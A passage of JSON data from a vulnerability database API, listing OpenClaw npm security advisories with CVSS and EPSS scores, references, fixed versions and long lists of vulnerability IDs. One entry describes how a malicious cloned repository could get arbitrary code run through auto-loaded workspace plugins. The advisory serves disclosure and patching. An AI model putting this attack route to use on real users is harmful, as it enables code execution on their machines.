versions: `<=v2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41910","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.2513","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25179","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25193","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41910"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19
:04:48Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vc32-h5mq-453v","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vc32-h5mq-453v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41910","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41910"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-owner-only-enforcement-in-allowlist-cross-channel-writes","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-owner-only-enforcement-in-allowlist-cross-channel-writes"},{"reference_url":"https://github.com/advisories/GHSA-vc32-h5mq-453v","reference_id":"GHSA-vc32-h5mq-453v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vc32-h5mq-453v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-
a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41910","GHSA-vc32-h5mq-453v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nw4r-wjgs-8qc1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90908?format=json","vulnerability_id":"VCID-nzu6-7a1g-4kf2","summary":"OpenClaw: Workspace plugin auto-discovery allowed code execution from cloned repositories\n### Summary\n\nOpenClaw automatically discovered and loaded plugins from `.openclaw/extensions/` inside the current workspace without an explicit trust or install step. 
A malicious repository could include a crafted workspace plugin that executed as soon as a user ran OpenClaw from that cloned directory.\n\n### Impact\n\nOpening or running OpenClaw in an untrusted repository could lead to arbitrary code execution under the user's account.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Workspace plugin loading now requires explicit trusted state before execution. Users should update to `2026.3.12` or later and avoid running OpenClaw inside untrusted repositories on older releases.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32920","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04205","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05411","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32920"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-99qw-6mr3-36qr","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:
H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:03:17Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-99qw-6mr3-36qr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32920","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32920"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-auto-discovery-of-workspace-plugins","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:03:17Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-auto-discovery-of-workspace-plugins"},{"reference_url":"https://github.com/advisories/GHSA-99qw-6mr3-36qr","reference_id":"GHSA-99qw-6mr3-36qr","reference_type":"","scores":[{"value":"HIGH","scoring
_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-99qw-6mr3-36qr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-
xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-
wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-
9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-
jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-
s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-32920","GHSA-99qw-6mr3-36qr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nzu6-7a1g-4kf2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89820?format=json","vulnerability_id":"VCID-p7gx-9usz-yyew","summary":"OpenClaw: Gateway plugin HTTP `auth: gateway` widens 